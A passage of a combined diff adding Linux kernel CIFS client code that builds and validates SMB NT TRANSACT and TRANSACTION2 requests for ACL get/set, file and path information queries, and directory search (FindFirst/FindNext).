++		goto GetExtAttrRetry;
++	return rc;
++}
++
++#endif /* CONFIG_POSIX */
++
++/*
++ * Initialize NT TRANSACT SMB into small smb request buffer.  This assumes that
++ * all NT TRANSACTS that we init here have total parm and data under about 400
++ * bytes (to fit in small cifs buffer size), which is the case so far, it
++ * easily fits. NB: Setup words themselves and ByteCount MaxSetupCount (size of
++ * returned setup area) and MaxParameterCount (returned parms size) must be set
++ * by caller
++ */
++static int
++smb_init_nttransact(const __u16 sub_command, const int setup_count,
++		   const int parm_len, struct cifs_tcon *tcon,
++		   void **ret_buf)
++{
++	int rc;
++	__u32 temp_offset;
++	struct smb_com_ntransact_req *pSMB;
++
++	rc = small_smb_init(SMB_COM_NT_TRANSACT, 19 + setup_count, tcon,
++				(void **)&pSMB);
++	if (rc)
++		return rc;
++	*ret_buf = (void *)pSMB;
++	pSMB->Reserved = 0;
++	pSMB->TotalParameterCount = cpu_to_le32(parm_len);
++	pSMB->TotalDataCount  = 0;
++	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->DataCount  = pSMB->TotalDataCount;
++	temp_offset = offsetof(struct smb_com_ntransact_req, Parms) +
++			(setup_count * 2) - 4 /* for rfc1001 length itself */;
++	pSMB->ParameterOffset = cpu_to_le32(temp_offset);
++	pSMB->DataOffset = cpu_to_le32(temp_offset + parm_len);
++	pSMB->SetupCount = setup_count; /* no need to le convert byte fields */
++	pSMB->SubCommand = cpu_to_le16(sub_command);
++	return 0;
++}
++
++static int
++validate_ntransact(char *buf, char **ppparm, char **ppdata,
++		   __u32 *pparmlen, __u32 *pdatalen)
++{
++	char *end_of_smb;
++	__u32 data_count, data_offset, parm_count, parm_offset;
++	struct smb_com_ntransact_rsp *pSMBr;
++	u16 bcc;
++
++	*pdatalen = 0;
++	*pparmlen = 0;
++
++	if (buf == NULL)
++		return -EINVAL;
++
++	pSMBr = (struct smb_com_ntransact_rsp *)buf;
++
++	bcc = get_bcc(&pSMBr->hdr);
++	end_of_smb = 2 /* sizeof byte count */ + bcc +
++			(char *)&pSMBr->ByteCount;
++
++	data_offset = le32_to_cpu(pSMBr->DataOffset);
++	data_count = le32_to_cpu(pSMBr->DataCount);
++	parm_offset = le32_to_cpu(pSMBr->ParameterOffset);
++	parm_count = le32_to_cpu(pSMBr->ParameterCount);
++
++	*ppparm = (char *)&pSMBr->hdr.Protocol + parm_offset;
++	*ppdata = (char *)&pSMBr->hdr.Protocol + data_offset;
++
++	/* should we also check that parm and data areas do not overlap? */
++	if (*ppparm > end_of_smb) {
++		cifs_dbg(FYI, "parms start after end of smb\n");
++		return -EINVAL;
++	} else if (parm_count + *ppparm > end_of_smb) {
++		cifs_dbg(FYI, "parm end after end of smb\n");
++		return -EINVAL;
++	} else if (*ppdata > end_of_smb) {
++		cifs_dbg(FYI, "data starts after end of smb\n");
++		return -EINVAL;
++	} else if (data_count + *ppdata > end_of_smb) {
++		cifs_dbg(FYI, "data %p + count %d (%p) past smb end %p start %p\n",
++			 *ppdata, data_count, (data_count + *ppdata),
++			 end_of_smb, pSMBr);
++		return -EINVAL;
++	} else if (parm_count + data_count > bcc) {
++		cifs_dbg(FYI, "parm count and data count larger than SMB\n");
++		return -EINVAL;
++	}
++	*pdatalen = data_count;
++	*pparmlen = parm_count;
++	return 0;
++}
++
++/* Get Security Descriptor (by handle) from remote server for a file or dir */
++int
++CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
++		  struct cifs_ntsd **acl_inf, __u32 *pbuflen)
++{
++	int rc = 0;
++	int buf_type = 0;
++	QUERY_SEC_DESC_REQ *pSMB;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++
++	cifs_dbg(FYI, "GetCifsACL\n");
++
++	*pbuflen = 0;
++	*acl_inf = NULL;
++
++	rc = smb_init_nttransact(NT_TRANSACT_QUERY_SECURITY_DESC, 0,
++			8 /* parm len */, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->MaxParameterCount = cpu_to_le32(4);
++	/* BB TEST with big acls that might need to be e.g. larger than 16K */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Fid = fid; /* file handle always le */
++	pSMB->AclFlags = cpu_to_le32(CIFS_ACL_OWNER | CIFS_ACL_GROUP |
++				     CIFS_ACL_DACL);
++	pSMB->ByteCount = cpu_to_le16(11); /* 3 bytes pad + 8 bytes parm */
++	inc_rfc1001_len(pSMB, 11);
++	iov[0].iov_base = (char *)pSMB;
++	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
++
++	rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovec */, &buf_type,
++			  0, &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QuerySecDesc = %d\n", rc);
++	} else {                /* decode response */
++		__le32 *parm;
++		__u32 parm_len;
++		__u32 acl_len;
++		struct smb_com_ntransact_rsp *pSMBr;
++		char *pdata;
++
++/* validate_nttransact */
++		rc = validate_ntransact(rsp_iov.iov_base, (char **)&parm,
++					&pdata, &parm_len, pbuflen);
++		if (rc)
++			goto qsec_out;
++		pSMBr = (struct smb_com_ntransact_rsp *)rsp_iov.iov_base;
++
++		cifs_dbg(FYI, "smb %p parm %p data %p\n",
++			 pSMBr, parm, *acl_inf);
++
++		if (le32_to_cpu(pSMBr->ParameterCount) != 4) {
++			rc = -EIO;      /* bad smb */
++			*pbuflen = 0;
++			goto qsec_out;
++		}
++
++/* BB check that data area is minimum length and as big as acl_len */
++
++		acl_len = le32_to_cpu(*parm);
++		if (acl_len != *pbuflen) {
++			cifs_dbg(VFS, "acl length %d does not match %d\n",
++				 acl_len, *pbuflen);
++			if (*pbuflen > acl_len)
++				*pbuflen = acl_len;
++		}
++
++		/* check if buffer is big enough for the acl
++		   header followed by the smallest SID */
++		if ((*pbuflen < sizeof(struct cifs_ntsd) + 8) ||
++		    (*pbuflen >= 64 * 1024)) {
++			cifs_dbg(VFS, "bad acl length %d\n", *pbuflen);
++			rc = -EINVAL;
++			*pbuflen = 0;
++		} else {
++			*acl_inf = kmemdup(pdata, *pbuflen, GFP_KERNEL);
++			if (*acl_inf == NULL) {
++				*pbuflen = 0;
++				rc = -ENOMEM;
++			}
++		}
++	}
++qsec_out:
++	free_rsp_buf(buf_type, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++CIFSSMBSetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
++			struct cifs_ntsd *pntsd, __u32 acllen, int aclflag)
++{
++	__u16 byte_count, param_count, data_count, param_offset, data_offset;
++	int rc = 0;
++	int bytes_returned = 0;
++	SET_SEC_DESC_REQ *pSMB = NULL;
++	void *pSMBr;
++
++setCifsAclRetry:
++	rc = smb_init(SMB_COM_NT_TRANSACT, 19, tcon, (void **) &pSMB, &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++
++	param_count = 8;
++	param_offset = offsetof(struct smb_com_transaction_ssec_req, Fid) - 4;
++	data_count = acllen;
++	data_offset = param_offset + param_count;
++	byte_count = 3 /* pad */  + param_count;
++
++	pSMB->DataCount = cpu_to_le32(data_count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->MaxParameterCount = cpu_to_le32(4);
++	pSMB->MaxDataCount = cpu_to_le32(16384);
++	pSMB->ParameterCount = cpu_to_le32(param_count);
++	pSMB->ParameterOffset = cpu_to_le32(param_offset);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->DataOffset = cpu_to_le32(data_offset);
++	pSMB->SetupCount = 0;
++	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_SET_SECURITY_DESC);
++	pSMB->ByteCount = cpu_to_le16(byte_count+data_count);
++
++	pSMB->Fid = fid; /* file handle always le */
++	pSMB->Reserved2 = 0;
++	pSMB->AclFlags = cpu_to_le32(aclflag);
++
++	if (pntsd && acllen) {
++		memcpy((char *)pSMBr + offsetof(struct smb_hdr, Protocol) +
++				data_offset, pntsd, acllen);
++		inc_rfc1001_len(pSMB, byte_count + data_count);
++	} else
++		inc_rfc1001_len(pSMB, byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++
++	cifs_dbg(FYI, "SetCIFSACL bytes_returned: %d, rc: %d\n",
++		 bytes_returned, rc);
++	if (rc)
++		cifs_dbg(FYI, "Set CIFS ACL returned %d\n", rc);
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto setCifsAclRetry;
++
++	return (rc);
++}
++
++
++/* Legacy Query Path Information call for lookup to old servers such
++   as Win9x/WinME */
++int
++SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
++		    const char *search_name, FILE_ALL_INFO *data,
++		    const struct nls_table *nls_codepage, int remap)
++{
++	QUERY_INFORMATION_REQ *pSMB;
++	QUERY_INFORMATION_RSP *pSMBr;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++
++	cifs_dbg(FYI, "In SMBQPath path %s\n", search_name);
++QInfRetry:
++	rc = smb_init(SMB_COM_QUERY_INFORMATION, 0, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   search_name, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, search_name);
++	}
++	pSMB->BufferFormat = 0x04;
++	name_len++; /* account for buffer type byte */
++	inc_rfc1001_len(pSMB, (__u16)name_len);
++	pSMB->ByteCount = cpu_to_le16(name_len);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QueryInfo = %d\n", rc);
++	} else if (data) {
++		struct timespec64 ts;
++		__u32 time = le32_to_cpu(pSMBr->last_write_time);
++
++		/* decode response */
++		/* BB FIXME - add time zone adjustment BB */
++		memset(data, 0, sizeof(FILE_ALL_INFO));
++		ts.tv_nsec = 0;
++		ts.tv_sec = time;
++		/* decode time fields */
++		data->ChangeTime = cpu_to_le64(cifs_UnixTimeToNT(ts));
++		data->LastWriteTime = data->ChangeTime;
++		data->LastAccessTime = 0;
++		data->AllocationSize =
++			cpu_to_le64(le32_to_cpu(pSMBr->size));
++		data->EndOfFile = data->AllocationSize;
++		data->Attributes =
++			cpu_to_le32(le16_to_cpu(pSMBr->attr));
++	} else
++		rc = -EIO; /* bad buffer passed in */
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QInfRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		 u16 netfid, FILE_ALL_INFO *pFindData)
++{
++	struct smb_t2_qfi_req *pSMB = NULL;
++	struct smb_t2_qfi_rsp *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	__u16 params, byte_count;
++
++QFileInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2 /* level */ + 2 /* fid */;
++	pSMB->t2.TotalDataCount = 0;
++	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->t2.MaxSetupCount = 0;
++	pSMB->t2.Reserved = 0;
++	pSMB->t2.Flags = 0;
++	pSMB->t2.Timeout = 0;
++	pSMB->t2.Reserved2 = 0;
++	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
++					       Fid) - 4);
++	pSMB->t2.DataCount = 0;
++	pSMB->t2.DataOffset = 0;
++	pSMB->t2.SetupCount = 1;
++	pSMB->t2.Reserved3 = 0;
++	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
++	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
++	pSMB->Pad = 0;
++	pSMB->Fid = netfid;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFileInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc) /* BB add auto retry on EOPNOTSUPP? */
++			rc = -EIO;
++		else if (get_bcc(&pSMBr->hdr) < 40)
++			rc = -EIO;	/* bad smb */
++		else if (pFindData) {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			memcpy((char *) pFindData,
++			       (char *) &pSMBr->hdr.Protocol +
++			       data_offset, sizeof(FILE_ALL_INFO));
++		} else
++		    rc = -ENOMEM;
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto QFileInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		 const char *search_name, FILE_ALL_INFO *data,
++		 int legacy /* old style infolevel */,
++		 const struct nls_table *nls_codepage, int remap)
++{
++	/* level 263 SMB_QUERY_FILE_ALL_INFO */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++
++	/* cifs_dbg(FYI, "In QPathInfo path %s\n", search_name); */
++QPathInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, search_name,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, search_name);
++	}
++
++	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	if (legacy)
++		pSMB->InformationLevel = cpu_to_le16(SMB_INFO_STANDARD);
++	else
++		pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QPathInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc) /* BB add auto retry on EOPNOTSUPP? */
++			rc = -EIO;
++		else if (!legacy && get_bcc(&pSMBr->hdr) < 40)
++			rc = -EIO;	/* bad smb */
++		else if (legacy && get_bcc(&pSMBr->hdr) < 24)
++			rc = -EIO;  /* 24 or 26 expected but we do not read
++					last field */
++		else if (data) {
++			int size;
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++
++			/*
++			 * On legacy responses we do not read the last field,
++			 * EAsize, fortunately since it varies by subdialect and
++			 * also note it differs on Set vs Get, ie two bytes or 4
++			 * bytes depending but we don't care here.
++			 */
++			if (legacy)
++				size = sizeof(FILE_INFO_STANDARD);
++			else
++				size = sizeof(FILE_ALL_INFO);
++			memcpy((char *) data, (char *) &pSMBr->hdr.Protocol +
++			       data_offset, size);
++		} else
++		    rc = -ENOMEM;
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto QPathInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		 u16 netfid, FILE_UNIX_BASIC_INFO *pFindData)
++{
++	struct smb_t2_qfi_req *pSMB = NULL;
++	struct smb_t2_qfi_rsp *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	__u16 params, byte_count;
++
++UnixQFileInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2 /* level */ + 2 /* fid */;
++	pSMB->t2.TotalDataCount = 0;
++	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->t2.MaxSetupCount = 0;
++	pSMB->t2.Reserved = 0;
++	pSMB->t2.Flags = 0;
++	pSMB->t2.Timeout = 0;
++	pSMB->t2.Reserved2 = 0;
++	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
++					       Fid) - 4);
++	pSMB->t2.DataCount = 0;
++	pSMB->t2.DataOffset = 0;
++	pSMB->t2.SetupCount = 1;
++	pSMB->t2.Reserved3 = 0;
++	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
++	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
++	pSMB->Pad = 0;
++	pSMB->Fid = netfid;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in UnixQFileInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
++			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			memcpy((char *) pFindData,
++			       (char *) &pSMBr->hdr.Protocol +
++			       data_offset,
++			       sizeof(FILE_UNIX_BASIC_INFO));
++		}
++	}
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto UnixQFileInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBUnixQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		     const unsigned char *searchName,
++		     FILE_UNIX_BASIC_INFO *pFindData,
++		     const struct nls_table *nls_codepage, int remap)
++{
++/* SMB_QUERY_FILE_UNIX_BASIC */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned = 0;
++	int name_len;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QPathInfo (Unix) the path %s\n", searchName);
++UnixQPathInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in UnixQPathInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
++			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			memcpy((char *) pFindData,
++			       (char *) &pSMBr->hdr.Protocol +
++			       data_offset,
++			       sizeof(FILE_UNIX_BASIC_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto UnixQPathInfoRetry;
++
++	return rc;
++}
++
++/* xid, tcon, searchName and codepage are input parms, rest are returned */
++int
++CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
++	      const char *searchName, struct cifs_sb_info *cifs_sb,
++	      __u16 *pnetfid, __u16 search_flags,
++	      struct cifs_search_info *psrch_inf, bool msearch)
++{
++/* level 257 SMB_ */
++	TRANSACTION2_FFIRST_REQ *pSMB = NULL;
++	TRANSACTION2_FFIRST_RSP *pSMBr = NULL;
++	T2_FFIRST_RSP_PARMS *parms;
++	int rc = 0;
++	int bytes_returned = 0;
++	int name_len, remap;
++	__u16 params, byte_count;
++	struct nls_table *nls_codepage;
++
++	cifs_dbg(FYI, "In FindFirst for %s\n", searchName);
++
++findFirstRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	nls_codepage = cifs_sb->local_nls;
++	remap = cifs_remap(cifs_sb);
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
++				       PATH_MAX, nls_codepage, remap);
++		/* We can not add the asterik earlier in case
++		it got remapped to 0xF03A as if it were part of the
++		directory name instead of a wildcard */
++		name_len *= 2;
++		if (msearch) {
++			pSMB->FileName[name_len] = CIFS_DIR_SEP(cifs_sb);
++			pSMB->FileName[name_len+1] = 0;
++			pSMB->FileName[name_len+2] = '*';
++			pSMB->FileName[name_len+3] = 0;
++			name_len += 4; /* now the trailing null */
++			/* null terminate just in case */
++			pSMB->FileName[name_len] = 0;
++			pSMB->FileName[name_len+1] = 0;
++			name_len += 2;
++		}
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++		if (msearch) {
++			if (WARN_ON_ONCE(name_len > PATH_MAX-2))
++				name_len = PATH_MAX-2;
++			/* overwrite nul byte */
++			pSMB->FileName[name_len-1] = CIFS_DIR_SEP(cifs_sb);
++			pSMB->FileName[name_len] = '*';
++			pSMB->FileName[name_len+1] = 0;
++			name_len += 2;
++		}
++	}
++
++	params = 12 + name_len /* includes null */ ;
++	pSMB->TotalDataCount = 0;	/* no EAs */
++	pSMB->MaxParameterCount = cpu_to_le16(10);
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(
++	      offsetof(struct smb_com_transaction2_ffirst_req, SearchAttributes)
++		- 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;	/* one byte, no need to make endian neutral */
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_FIRST);
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
++			ATTR_DIRECTORY);
++	pSMB->SearchCount = cpu_to_le16(CIFSMaxBufSize/sizeof(FILE_UNIX_INFO));
++	pSMB->SearchFlags = cpu_to_le16(search_flags);
++	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
++
++	/* BB what should we set StorageType to? Does it matter? BB */
++	pSMB->SearchStorageType = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_ffirst);
++
++	if (rc) {/* BB add logic to retry regular search if Unix search
++			rejected unexpectedly by server */
++		/* BB Add code to handle unsupported level rc */
++		cifs_dbg(FYI, "Error in FindFirst = %d\n", rc);
++
++		cifs_buf_release(pSMB);
++
++		/* BB eventually could optimize out free and realloc of buf */
++		/*    for this case */
++		if (rc == -EAGAIN)
++			goto findFirstRetry;
++	} else { /* decode response */
++		/* BB remember to free buffer if error BB */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		if (rc == 0) {
++			unsigned int lnoff;
++
++			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++				psrch_inf->unicode = true;
++			else
++				psrch_inf->unicode = false;
++
++			psrch_inf->ntwrk_buf_start = (char *)pSMBr;
++			psrch_inf->smallBuf = false;
++			psrch_inf->srch_entries_start =
++				(char *) &pSMBr->hdr.Protocol +
++					le16_to_cpu(pSMBr->t2.DataOffset);
++			parms = (T2_FFIRST_RSP_PARMS *)((char *) &pSMBr->hdr.Protocol +
++			       le16_to_cpu(pSMBr->t2.ParameterOffset));
++
++			if (parms->EndofSearch)
++				psrch_inf->endOfSearch = true;
++			else
++				psrch_inf->endOfSearch = false;
++
++			psrch_inf->entries_in_buffer =
++					le16_to_cpu(parms->SearchCount);
++			psrch_inf->index_of_last_entry = 2 /* skip . and .. */ +
++				psrch_inf->entries_in_buffer;
++			lnoff = le16_to_cpu(parms->LastNameOffset);
++			if (CIFSMaxBufSize < lnoff) {
++				cifs_dbg(VFS, "ignoring corrupt resume name\n");
++				psrch_inf->last_entry = NULL;
++				return rc;
++			}
++
++			psrch_inf->last_entry = psrch_inf->srch_entries_start +
++							lnoff;
++
++			if (pnetfid)
++				*pnetfid = parms->SearchHandle;
++		} else {
++			cifs_buf_release(pSMB);
++		}
++	}
++
++	return rc;
++}
++
++int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
++		 __u16 searchHandle, __u16 search_flags,
++		 struct cifs_search_info *psrch_inf)
++{
++	TRANSACTION2_FNEXT_REQ *pSMB = NULL;
++	TRANSACTION2_FNEXT_RSP *pSMBr = NULL;
++	T2_FNEXT_RSP_PARMS *parms;
++	char *response_data;
++	int rc = 0;
++	int bytes_returned;
++	unsigned int name_len;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In FindNext\n");
++
++	if (psrch_inf->endOfSearch)
++		return -ENOENT;
++
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		(void **) &pSMBr);
